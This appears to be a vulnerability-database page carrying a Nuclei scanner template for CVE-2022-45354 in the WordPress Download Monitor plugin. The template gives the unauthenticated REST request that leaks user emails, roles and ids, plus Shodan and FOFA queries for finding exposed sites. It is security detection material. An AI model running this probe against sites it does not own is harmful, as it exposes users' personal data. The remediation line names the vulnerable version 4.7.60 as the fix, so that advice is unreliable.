Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-45354
HistoryJul 11, 2023 - 7:54 p.m.

Download Monitor <= 4.7.60 - Sensitive Information Exposure

2023-07-1119:54:50
ProjectDiscovery
github.com
4
cve2022 wordpress wp-plugin download-monitor sensitive-info-exposure rest-api security-vulnerability unauthorized-access

0.005 Low

EPSS

Percentile

76.2%

The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
id: CVE-2022-45354

info:
  name: Download Monitor <= 4.7.60 - Sensitive Information Exposure
  author: DhiyaneshDK
  severity: high
  description: |
    The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks or unauthorized access.
  remediation: |
    Update to the latest version of the Download Monitor plugin (4.7.60) or apply the provided patch to fix the vulnerability.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2022-45354
    - https://wordpress.org/plugins/download-monitor/
    - https://patchstack.com/database/vulnerability/download-monitor/wordpress-download-monitor-plugin-4-7-60-sensitive-data-exposure-vulnerability?_s_id=cve
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-45354
    epss-score: 0.00492
    epss-percentile: 0.7614
    cpe: cpe:2.3:a:wpchill:download_monitor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpchill
    product: download_monitor
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/download-monitor/"
    fofa-query: body="/wp-content/plugins/download-monitor/"
  tags: cve,cve2022,wordpress,wp-plugin,download-monitor,wp

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/download-monitor/v1/user_data"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"registered":'
          - '"display_name":'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d3aee961f865ab0369274e259216c6aeb8c0e3e05085fcc01c6e0bdc64144aec022100c8df2a03150f4267cb69a65308a40da4bcfe440d407ddbcf758fd1f0d6360525:922c64590222798bb761d5b6d8e72950

0.005 Low

EPSS

Percentile

76.2%